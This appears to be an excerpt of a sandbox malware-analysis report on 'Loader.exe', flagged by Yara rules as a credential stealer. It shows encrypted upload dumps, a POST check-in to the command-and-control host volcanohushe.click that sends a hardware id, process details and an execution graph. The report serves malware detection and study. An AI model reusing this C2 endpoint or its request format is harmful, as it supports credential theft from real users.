                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: 60 47 69 9d ff 0f 4d 3c 8c aa fc 94 50 1c bf 2b b9 41 f5 ae 69 70 5a 61 55 e6 3e 9c 55 0a a3 62 55 20 c6 c1 77 1c df d1 43 eb e9 a7 0b d5 f1 d7 68 5a 53 da af e6 9f ac 91 c3 e1 25 d3 69 85 83 2d e6 41 8c e6 a2 63 eb 13 e7 be 73 a3 8c a3 01 08 2b 7a f9 ad c6 f5 7f 47 e5 d7 11 74 69 c2 80 38 80 e1 f0 9d 09 d2 5e ed 58 67 ea 3b 40 e6 65 1f 4b 4e 4d 81 f1 9b 8b b2 9a 05 bf f8 e9 81 ff 9c 22 7d 0e 4b 0a 51 17 8d 60 58 49 90 9d 88 73 ed a6 a8 ee 48 fa 59 54 aa 1f 1b ff 07 dd 1f 05 b6 44 d9 ed 52 92 01 1d 75 a7 57 95 14 fe 39 93 1a c7 3c ed f0 33 52 58 e6 80 e0 37 45 f9 74 aa ff f6 e9 8a 71 23 34 97 ad a6 6d 59 82 9c 03 d5 bd f8 b4 1b 68 c1 d6 31 7a 6b 19 90 5a 45 4f 9a f5 a7 78 93 5a 78 7f 9f ae 71 51 5d 6a d2 a3 ea ee ff 6d 97 9d 91 80 d6 12 89 9f 9c 5f a8 11
                                                                                      Data Ascii: `GiM<P+AipZaU>UbU wChZS%i-Acs+zGti8^Xg;@eKNM"}KQ`XIsHYTDRuW9<3RX7Etq#4mYh1zkZEOxZxqQ]jm_
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: 31 3f 4e 3e 3f 11 86 05 0a f4 21 c1 58 23 d9 4c f9 61 85 e7 f4 12 2c be 31 47 73 cd 5d 28 51 0a e7 24 75 0c 58 61 c9 98 b9 c3 0d 43 6d d0 db da 7b 13 0e b1 06 6d 3b bd 68 76 ad 1d 62 7b 2a ba c5 61 27 16 84 c8 f9 65 13 ce 26 d1 54 5d 8d 92 ed a5 80 39 4b d9 e0 69 b6 90 28 21 53 67 f3 d6 49 0f 70 d1 32 b3 6c 49 14 70 9d ee f7 ae 91 46 fa 40 6f c6 26 cb f5 6d 08 f5 75 aa 26 94 61 6a ac bf 8d 5f 2e 22 17 5c 08 fa f2 43 f8 a6 d2 3e d6 cf 47 54 54 94 fa 01 9e 2d 34 bb 7d 67 40 11 53 a5 f2 2a 4a f7 17 8a bf 20 76 04 8f a8 fa 20 05 a3 22 a3 e3 74 44 4e ec a4 64 38 14 0e f6 47 8d 54 05 80 7d 13 6c 1e b0 87 c5 fd 67 f1 c9 05 dc ed 9c 66 4f 64 3e e1 df 19 77 7d 8d 31 34 b6 5c 3d da cf 2f c4 19 e7 e4 b7 1c d8 46 06 ad 25 1d 8c 9b 37 08 ed 31 9d c8 db f4 9b f0 66 f9
                                                                                      Data Ascii: 1?N>?!X#La,1Gs](Q$uXaCm{m;hvb{*a'e&T]9Ki(!SgIp2lIpF@o&mu&aj_."\C>GTT-4}g@S*J v "tDNd8GT}lgfOd>w}14\=/F%71f
                                                                                      2024-12-24 01:17:25 UTC1131INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=72m289a8ng3u4o0icbtphg7ofj; expires=Fri, 18 Apr 2025 19:04:03 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS9pd5J4nanzBwQSgmOfJVGx1exhjWeNZl0E7IBpHH8vV71yCaU0dnGfebusM7Ai6NtzcLHm2wqD3PfY0AqeHli1DagcQSEtesG5v6zn4wdO%2BBzjCnmvlsnN8Q594FwqJBXZTkM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cc054eccf7cf3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1937&rtt_var=729&sent=208&recv=604&lost=0&retrans=0&sent_bytes=2844&recv_bytes=578505&delivery_rate=1499743&cwnd=218&unsent_bytes=0&cid=f772a4a80a73a958&ts=3425&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.649754172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:26 UTC266OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 85
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:26 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d 26 68 77 69 64 3d 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37
                                                                                      Data Ascii: act=get_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=&hwid=E887D0B6A53AEE368246926E533C64D7
                                                                                      2024-12-24 01:17:27 UTC1129INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=p8utlv6iruk5l4f608drlm1fir; expires=Fri, 18 Apr 2025 19:04:06 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5omvH10W34DQK9M7y1phkkUFk5kqtuttCT6ZmiYIr5e2JuOG8o1zUpeAf0IGLEV%2BOBSj4PcoG5vCvUNBbr2YxORSGZN2vyWrb8H0%2F5zjTmvVvsBrd6KMom%2FJiSBV%2Flt7zIwv9ec%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cc072b8410f5f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1481&rtt_var=565&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1921052&cwnd=234&unsent_bytes=0&cid=cc5cf3c716f39256&ts=779&x=0"
                                                                                      2024-12-24 01:17:27 UTC240INData Raw: 62 65 65 0d 0a 4a 32 78 47 6c 68 6d 4d 43 6f 78 37 55 69 6c 67 63 69 69 62 6f 6b 79 6f 72 38 31 62 73 4a 38 74 39 74 62 41 67 5a 49 47 73 78 78 38 46 32 54 77 62 61 34 77 76 56 64 77 54 45 4a 49 47 62 65 41 4b 49 71 56 37 78 2f 45 35 56 6d 6b 67 4b 7a 79 75 57 7a 6a 56 46 38 76 50 50 52 53 36 6d 50 30 4c 77 4a 66 4b 41 51 44 33 63 59 4a 33 4d 65 35 48 76 37 54 54 70 4b 39 73 62 44 6b 64 4e 39 59 54 78 77 51 30 45 37 4c 63 4c 6f 32 61 6e 6b 6c 50 6d 62 6f 30 6d 66 6b 36 59 42 77 69 50 70 78 32 65 4b 57 73 63 45 30 39 43 31 32 58 44 4c 75 4b 39 39 34 32 31 41 6e 65 46 63 52 48 38 37 30 46 73 72 2f 6f 69 48 49 70 33 79 46 35 4c 6e 76 70 6e 58 6d 5a 68 41 55 63 63 6f 32 35 46 4c 65 4e 77 74 4c 4d 6a 5a 37 71 4f 6f
                                                                                      Data Ascii: beeJ2xGlhmMCox7Uilgciibokyor81bsJ8t9tbAgZIGsxx8F2Twba4wvVdwTEJIGbeAKIqV7x/E5VmkgKzyuWzjVF8vPPRS6mP0LwJfKAQD3cYJ3Me5Hv7TTpK9sbDkdN9YTxwQ0E7LcLo2anklPmbo0mfk6YBwiPpx2eKWscE09C12XDLuK99421AneFcRH870Fsr/oiHIp3yF5LnvpnXmZhAUcco25FLeNwtLMjZ7qOo
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 56 30 64 75 76 62 59 58 65 59 4c 69 4f 6b 37 44 38 58 34 74 41 43 46 73 72 38 46 71 2b 55 72 6b 31 50 45 55 71 4f 47 4f 72 7a 48 6e 74 32 61 73 35 69 50 6c 4f 6c 49 72 76 75 64 52 56 78 58 34 58 49 68 79 67 52 61 4e 44 74 42 77 33 65 31 59 69 63 50 37 48 4f 50 6e 5a 75 53 2f 45 74 47 65 46 75 72 48 72 38 47 37 37 55 52 56 65 41 61 64 59 34 44 50 30 53 52 42 62 4d 30 52 64 7a 39 4e 38 77 50 79 48 41 64 4c 50 51 6f 79 75 2b 4e 44 68 4e 49 74 79 45 78 39 30 70 57 37 30 65 4d 51 54 43 6e 67 73 4b 30 72 4a 35 68 57 62 35 35 63 51 78 50 30 62 77 35 4b 7a 2b 2b 5a 55 35 58 41 66 52 79 7a 47 55 66 52 4a 39 68 6b 5a 54 77 6b 4b 63 4d 76 55 46 4e 36 45 69 7a 2f 31 30 55 57 43 6b 4c 54 4e 38 57 4c 59 62 52 59 61 4e 50 31 51 76 30 57 39 50 51 56 2b 47 6b 52 6c 6f 38
                                                                                      Data Ascii: V0duvbYXeYLiOk7D8X4tACFsr8Fq+Urk1PEUqOGOrzHnt2as5iPlOlIrvudRVxX4XIhygRaNDtBw3e1YicP7HOPnZuS/EtGeFurHr8G77URVeAadY4DP0SRBbM0Rdz9N8wPyHAdLPQoyu+NDhNItyEx90pW70eMQTCngsK0rJ5hWb55cQxP0bw5Kz++ZU5XAfRyzGUfRJ9hkZTwkKcMvUFN6Eiz/10UWCkLTN8WLYbRYaNP1Qv0W9PQV+GkRlo8
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 2b 69 4f 48 77 77 4b 65 6a 70 4c 4e 79 32 54 68 57 48 52 66 44 73 78 53 2b 47 69 36 54 68 5a 64 47 67 5a 36 7a 63 34 2f 67 38 57 64 45 38 6a 63 56 35 53 64 70 75 6a 71 55 75 4e 71 62 78 70 74 30 48 33 4a 66 75 51 50 46 32 63 73 45 55 7a 77 30 33 33 65 33 61 59 55 67 39 41 63 73 49 47 58 2b 36 52 4c 69 33 70 69 49 41 6a 6c 61 61 64 47 79 6a 5a 35 45 51 55 75 42 36 2f 30 66 50 75 64 69 6d 76 68 72 31 6d 4f 35 4a 50 7a 78 53 33 47 54 52 41 50 63 63 4e 50 31 6d 6a 63 46 43 68 52 57 43 4e 62 71 64 73 69 6e 4e 79 59 49 59 66 6e 47 71 72 35 71 4e 6e 41 53 75 70 2b 64 53 67 56 70 56 48 57 51 66 67 5a 5a 42 77 6b 42 6c 4c 76 38 42 72 45 33 4f 59 78 34 4e 64 56 74 61 79 69 79 76 52 76 79 30 68 33 47 67 37 67 4d 73 70 75 79 51 38 36 58 53 55 38 5a 50 6a 47 4a 39 6d
                                                                                      Data Ascii: +iOHwwKejpLNy2ThWHRfDsxS+Gi6ThZdGgZ6zc4/g8WdE8jcV5SdpujqUuNqbxpt0H3JfuQPF2csEUzw033e3aYUg9AcsIGX+6RLi3piIAjlaadGyjZ5EQUuB6/0fPudimvhr1mO5JPzxS3GTRAPccNP1mjcFChRWCNbqdsinNyYIYfnGqr5qNnASup+dSgVpVHWQfgZZBwkBlLv8BrE3OYx4NdVtayiyvRvy0h3Gg7gMspuyQ86XSU8ZPjGJ9m
                                                                                      2024-12-24 01:17:27 UTC83INData Raw: 2f 78 56 7a 6f 65 7a 73 4e 67 79 35 79 30 66 56 41 66 38 61 38 35 6d 2b 44 6b 65 63 41 49 6f 5a 65 33 4a 4f 2b 66 6c 6e 52 50 6d 7a 6e 57 6c 6d 35 50 30 2f 30 2f 71 4c 30 30 49 43 2f 31 59 35 6c 37 55 51 6a 4d 43 53 30 56 39 72 75 38 39 36 2b 0d 0a
                                                                                      Data Ascii: /xVzoezsNgy5y0fVAf8a85m+DkecAIoZe3JO+flnRPmznWlm5P0/0/qL00IC/1Y5l7UQjMCS0V9ru896+
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 32 61 62 32 0d 0a 47 67 4c 4d 62 71 47 37 69 38 6c 4c 6a 61 4e 2f 68 4e 63 67 30 43 2b 45 2f 41 52 2b 55 4f 61 6d 6f 72 45 55 44 63 34 42 2f 38 2b 49 38 68 2b 39 46 33 73 2b 4f 7a 32 4f 4e 58 2b 69 30 4d 56 41 72 61 53 73 4e 41 33 69 6f 5a 47 53 34 33 45 4e 62 34 42 73 72 4f 6f 51 76 78 70 33 2b 56 34 5a 54 4c 33 46 79 43 4a 48 63 69 50 39 42 64 2b 31 44 65 41 32 4e 49 43 78 63 63 37 2b 73 51 68 2f 69 42 45 4e 72 37 58 4a 79 46 6d 4c 4c 42 63 73 5a 66 5a 53 45 78 6f 6e 2b 31 51 2b 64 4b 4e 55 70 57 4b 30 37 74 6b 54 72 30 67 49 68 73 31 4e 4d 59 73 70 37 34 73 4d 74 69 32 47 30 57 47 6a 54 36 64 74 51 2f 79 69 49 46 47 78 68 42 53 64 62 31 4e 4a 72 35 70 77 6a 43 30 6e 75 6c 72 36 66 6e 79 46 2f 61 57 58 49 47 41 61 52 39 35 33 36 34 50 79 52 54 43 51 74
                                                                                      Data Ascii: 2ab2GgLMbqG7i8lLjaN/hNcg0C+E/AR+UOamorEUDc4B/8+I8h+9F3s+Oz2ONX+i0MVAraSsNA3ioZGS43ENb4BsrOoQvxp3+V4ZTL3FyCJHciP9Bd+1DeA2NICxcc7+sQh/iBENr7XJyFmLLBcsZfZSExon+1Q+dKNUpWK07tkTr0gIhs1NMYsp74sMti2G0WGjT6dtQ/yiIFGxhBSdb1NJr5pwjC0nulr6fnyF/aWXIGAaR95364PyRTCQt
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 63 4c 65 74 79 7a 71 30 52 6d 34 76 36 4c 6b 6f 57 44 55 55 45 77 56 47 72 6c 65 36 56 76 67 4e 51 4a 78 42 7a 39 39 2b 74 52 36 6d 4f 57 68 62 75 79 77 57 4a 4f 2f 73 76 6a 66 66 49 70 41 43 43 63 76 2b 48 2b 35 57 2b 34 35 5a 6e 68 52 43 30 4c 53 6b 52 62 46 77 76 55 70 2f 2f 70 59 70 4f 47 55 38 4e 73 33 35 43 34 66 47 42 44 48 63 38 5a 51 37 6b 30 6c 51 78 59 42 51 65 33 59 65 2f 53 41 70 57 76 32 32 45 62 44 6b 4a 53 7a 6f 30 76 4b 55 58 51 48 41 4e 46 74 70 31 4c 34 4b 51 52 48 4e 44 4e 62 37 4a 59 44 6e 65 61 35 61 74 66 37 59 6f 62 39 6f 65 6d 67 58 39 41 72 51 79 42 7a 30 6c 47 30 4f 39 55 66 4f 56 68 52 42 46 72 32 37 41 54 36 2f 34 6f 31 77 4e 30 59 7a 34 4b 30 79 61 56 79 33 33 68 4f 48 6e 47 68 62 37 6c 65 79 42 6b 57 63 53 4d 6c 48 64 72 44
                                                                                      Data Ascii: cLetyzq0Rm4v6LkoWDUUEwVGrle6VvgNQJxBz99+tR6mOWhbuywWJO/svjffIpACCcv+H+5W+45ZnhRC0LSkRbFwvUp//pYpOGU8Ns35C4fGBDHc8ZQ7k0lQxYBQe3Ye/SApWv22EbDkJSzo0vKUXQHANFtp1L4KQRHNDNb7JYDnea5atf7Yob9oemgX9ArQyBz0lG0O9UfOVhRBFr27AT6/4o1wN0Yz4K0yaVy33hOHnGhb7leyBkWcSMlHdrD
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 34 2f 67 61 68 72 68 62 4b 73 32 4b 4e 4e 79 56 70 39 44 79 6e 65 4b 39 56 70 75 78 38 65 48 43 51 36 45 4b 72 37 4b 4d 50 65 2f 43 33 43 38 30 4b 75 34 34 62 46 31 6c 48 4c 4c 30 52 55 45 65 34 72 32 6c 50 67 53 69 64 73 41 67 4e 42 6f 35 4e 35 37 70 2b 65 44 49 62 30 54 70 37 69 2b 4f 62 39 62 38 4e 62 64 52 6f 41 38 46 4c 5a 5a 4f 38 4a 41 6e 34 6d 43 77 50 59 39 58 37 42 77 66 6b 6f 35 64 42 78 32 5a 43 71 34 36 4e 6a 34 53 35 44 41 42 7a 39 61 4d 4a 62 7a 30 73 42 51 69 56 45 55 75 4c 6f 4a 38 4c 4e 6a 42 72 79 30 6c 72 43 67 76 50 46 7a 69 6e 33 52 47 45 66 66 38 46 42 34 48 7a 51 56 42 63 65 45 6a 35 36 37 38 38 64 77 50 6d 38 44 75 66 75 63 64 6d 6b 71 38 50 7a 4c 59 74 32 46 43 63 38 70 32 33 30 55 73 6f 33 48 46 77 52 50 56 72 4c 38 67 50 62 2b
                                                                                      Data Ascii: 4/gahrhbKs2KNNyVp9DyneK9Vpux8eHCQ6EKr7KMPe/C3C80Ku44bF1lHLL0RUEe4r2lPgSidsAgNBo5N57p+eDIb0Tp7i+Ob9b8NbdRoA8FLZZO8JAn4mCwPY9X7Bwfko5dBx2ZCq46Nj4S5DABz9aMJbz0sBQiVEUuLoJ8LNjBry0lrCgvPFzin3RGEff8FB4HzQVBceEj56788dwPm8Dufucdmkq8PzLYt2FCc8p230Uso3HFwRPVrL8gPb+
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 6f 53 49 79 66 68 64 58 45 62 73 41 33 53 7a 51 50 70 43 2f 6d 61 4d 63 64 4f 31 45 30 4f 6b 6e 52 69 58 37 66 36 34 67 63 2b 74 4a 6f 75 4a 71 6a 37 38 64 4a 68 58 4e 46 41 51 6a 65 4d 72 52 61 77 43 67 77 47 41 67 69 55 4e 48 7a 4e 50 72 2f 71 47 76 49 32 55 53 6c 76 62 6e 72 35 30 79 44 53 78 49 74 44 66 6c 36 34 6a 76 34 48 53 68 69 44 53 73 59 38 63 30 6d 36 2b 79 6c 63 50 37 4a 56 4c 69 6a 72 37 50 72 61 49 64 76 63 68 52 79 32 56 66 44 58 4e 6f 4c 46 30 39 59 48 48 4c 4a 36 33 37 66 6d 36 6c 69 31 2b 39 48 70 62 53 78 30 75 59 7a 39 6c 35 45 47 33 4c 61 59 50 70 66 77 67 6b 72 55 54 51 36 59 64 62 73 41 64 44 39 68 43 2f 59 70 6d 61 6b 68 62 48 5a 2b 56 50 77 4e 32 49 4a 41 76 70 64 76 30 33 6a 50 44 41 59 45 78 46 68 72 4a 49 31 2b 38 53 2b 47 6f
                                                                                      Data Ascii: oSIyfhdXEbsA3SzQPpC/maMcdO1E0OknRiX7f64gc+tJouJqj78dJhXNFAQjeMrRawCgwGAgiUNHzNPr/qGvI2USlvbnr50yDSxItDfl64jv4HShiDSsY8c0m6+ylcP7JVLijr7PraIdvchRy2VfDXNoLF09YHHLJ637fm6li1+9HpbSx0uYz9l5EG3LaYPpfwgkrUTQ6YdbsAdD9hC/YpmakhbHZ+VPwN2IJAvpdv03jPDAYExFhrJI1+8S+Go
                                                                                      2024-12-24 01:17:27 UTC1369INData Raw: 76 36 54 5a 70 6a 2f 38 61 55 30 55 45 64 4a 74 39 6e 37 75 4d 51 34 47 46 6a 42 72 79 2b 73 65 32 38 57 76 45 4e 62 32 62 4a 72 6c 70 36 72 67 4d 2f 31 31 53 68 51 4b 2f 53 75 39 54 39 42 55 4f 6c 6f 75 42 6e 76 4d 35 78 43 48 36 5a 51 6f 32 73 39 61 68 37 57 49 34 76 68 6b 77 6c 4a 55 48 47 33 61 58 38 45 7a 77 68 31 6c 48 69 73 46 54 4f 4c 78 4a 38 37 6d 2f 48 43 44 36 6b 4b 4f 35 4c 72 4f 32 6d 72 6a 64 31 55 49 45 63 5a 71 39 6e 4b 38 53 47 74 6c 42 52 67 59 37 64 45 6b 32 39 66 36 42 35 2f 33 48 4c 69 75 6f 75 69 35 66 74 46 51 62 69 73 56 78 6c 2f 70 57 39 42 55 59 33 77 34 43 47 2b 71 36 33 79 51 36 59 41 6f 38 66 56 78 32 61 65 6f 74 2b 74 2b 36 6b 41 49 42 6a 50 75 65 4d 74 75 77 45 34 57 59 56 68 44 63 66 2f 4a 50 5a 6e 5a 76 7a 62 32 37 6e 32
                                                                                      Data Ascii: v6TZpj/8aU0UEdJt9n7uMQ4GFjBry+se28WvENb2bJrlp6rgM/11ShQK/Su9T9BUOlouBnvM5xCH6ZQo2s9ah7WI4vhkwlJUHG3aX8Ezwh1lHisFTOLxJ87m/HCD6kKO5LrO2mrjd1UIEcZq9nK8SGtlBRgY7dEk29f6B5/3HLiuoui5ftFQbisVxl/pW9BUY3w4CG+q63yQ6YAo8fVx2aeot+t+6kAIBjPueMtuwE4WYVhDcf/JPZnZvzb27n2


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:20:17:02
                                                                                      Start date:23/12/2024
                                                                                      Path:C:\Users\user\Desktop\Loader.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                      Imagebase:0xeb0000
                                                                                      File size:540'160 bytes
                                                                                      MD5 hash:245D1F68F4E8CAFFB294D206958761E5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:20:17:02
                                                                                      Start date:23/12/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:20:17:02
                                                                                      Start date:23/12/2024
                                                                                      Path:C:\Users\user\Desktop\Loader.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                      Imagebase:0xeb0000
                                                                                      File size:540'160 bytes
                                                                                      MD5 hash:245D1F68F4E8CAFFB294D206958761E5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:1.2%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:32
                                                                                        execution_graph 23232 ebd1f8 23233 ebd20c 23232->23233 23234 ebd431 69 API calls 23233->23234 23239 ebd267 23233->23239 23235 ebd237 23234->23235 23236 ebd254 23235->23236 23237 ec6c61 67 API calls 23235->23237 23235->23239 23236->23239 23240 ec7e7d 23236->23240 23237->23236 23241 ec7e9d 23240->23241 23242 ec7e88 23240->23242 23244 ec7eba 23241->23244 23245 ec7ea5 23241->23245 23243 ec6bb1 __strnicoll 14 API calls 23242->23243 23247 ec7e8d 23243->23247 23254 ed1944 23244->23254 23248 ec6bb1 __strnicoll 14 API calls 23245->23248 23251 ec729c __strnicoll 29 API calls 23247->23251 23249 ec7eaa 23248->23249 23252 ec729c __strnicoll 29 API calls 23249->23252 23250 ec7eb5 23250->23239 23253 ec7e98 23251->23253 23252->23250 23253->23239 23255 ed1958 _Fputc 23254->23255 23258 ed1eed 23255->23258 23257 ed1964 _Fputc 23257->23250 23259 ed1ef9 ___scrt_is_nonwritable_in_current_image 23258->23259 23260 ed1f00 23259->23260 23261 ed1f23 23259->23261 23262 ec7445 __strnicoll 29 API calls 23260->23262 23269 ec1d4e EnterCriticalSection 23261->23269 23268 ed1f19 23262->23268 23264 ed1f31 23270 ed1d4c 23264->23270 23266 ed1f40 23283 ed1f72 23266->23283 23268->23257 23269->23264 23271 ed1d5b 23270->23271 23272 ed1d83 23270->23272 23273 ec7445 __strnicoll 29 API calls 23271->23273 23274 ece509 _Ungetc 29 API calls 23272->23274 23282 ed1d76 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23273->23282 23275 ed1d8c 23274->23275 23276 ed177e 33 API calls 23275->23276 23277 ed1daa 23276->23277 23278 ed1e36 23277->23278 23280 ed1e4d 23277->23280 23277->23282 23279 ed19d6 34 API calls 23278->23279 23279->23282 23281 ed1b81 33 API calls 23280->23281 23280->23282 23281->23282 23282->23266 23286 ec1d62 LeaveCriticalSection 23283->23286 23285 ed1f7a 23285->23268 23286->23285 21567 ecccc5 21570 ec75ab LeaveCriticalSection 21567->21570 21569 eccccc 21570->21569 18837 ebedd0 18838 ebeddc ___scrt_is_nonwritable_in_current_image 18837->18838 18863 ebbc28 18838->18863 18840 ebede3 18841 ebef3c 18840->18841 18851 ebee0d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 18840->18851 18915 ebe42c IsProcessorFeaturePresent 18841->18915 18843 ebef43 18894 ec4a0a 18843->18894 18848 ebee2c 18849 ebeead 18874 ec6f89 18849->18874 18851->18848 18851->18849 18897 ec4a54 18851->18897 18853 ebeeb3 18878 eb1bf0 18853->18878 18864 ebbc31 18863->18864 18922 ebe094 IsProcessorFeaturePresent 18864->18922 18868 ebbc42 18869 ebbc46 18868->18869 18932 ec1caf 18868->18932 18869->18840 18872 ebbc5d 18872->18840 18875 ec6f92 18874->18875 18877 ec6f97 18874->18877 19004 ec70b2 18875->19004 18877->18853 18879 eb1c2d 18878->18879 19914 eb2830 18879->19914 21239 ec4b55 18894->21239 18898 ec4a6a std::_Locinfo::_Locinfo_dtor 18897->18898 18899 ec923b ___scrt_is_nonwritable_in_current_image 18897->18899 18898->18849 18900 ecafb3 __Getctype 39 API calls 18899->18900 18903 ec924c 18900->18903 18901 ec7806 CallUnexpected 39 API calls 18902 ec9276 18901->18902 18903->18901 18916 ebe442 __CreateFrameInfo std::bad_exception::bad_exception 18915->18916 18917 ebe4ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18916->18917 18918 ebe531 __CreateFrameInfo 18917->18918 18918->18843 18919 ec4a20 18920 ec4b55 __CreateFrameInfo 21 API calls 18919->18920 18921 ebef51 18920->18921 18923 ebbc3d 18922->18923 18924 ebf76c 18923->18924 18941 eca9f6 18924->18941 18927 ebf775 18927->18868 18929 ebf77d 18930 ebf788 18929->18930 18955 ecaa32 18929->18955 18930->18868 18995 ecd0ee 18932->18995 18935 ebf78b 18936 ebf79e 18935->18936 18937 ebf794 18935->18937 18936->18869 18938 ec9acb ___vcrt_uninitialize_ptd 6 API calls 18937->18938 18939 ebf799 18938->18939 18940 ecaa32 ___vcrt_uninitialize_locks DeleteCriticalSection 18939->18940 18940->18936 18944 eca9ff 18941->18944 18943 ecaa28 18945 ecaa32 ___vcrt_uninitialize_locks DeleteCriticalSection 18943->18945 18944->18943 18946 ebf771 18944->18946 18959 ed527a 18944->18959 18945->18946 18946->18927 18947 ec9a98 18946->18947 18976 ed518b 18947->18976 18950 ec9aad 18950->18929 18953 ec9ac8 18953->18929 18956 ecaa3d 18955->18956 18958 ecaa5c 18955->18958 18957 ecaa47 DeleteCriticalSection 18956->18957 18957->18957 18957->18958 18958->18927 18964 ed530c 18959->18964 18962 ed52b2 InitializeCriticalSectionAndSpinCount 18963 ed529d 18962->18963 18963->18944 18965 ed5294 18964->18965 18968 ed532d 18964->18968 18965->18962 18965->18963 18966 ed5395 GetProcAddress 18966->18965 18968->18965 18968->18966 18969 ed5386 18968->18969 18971 ed52c1 LoadLibraryExW 18968->18971 18969->18966 18970 ed538e FreeLibrary 18969->18970 18970->18966 18972 ed52d8 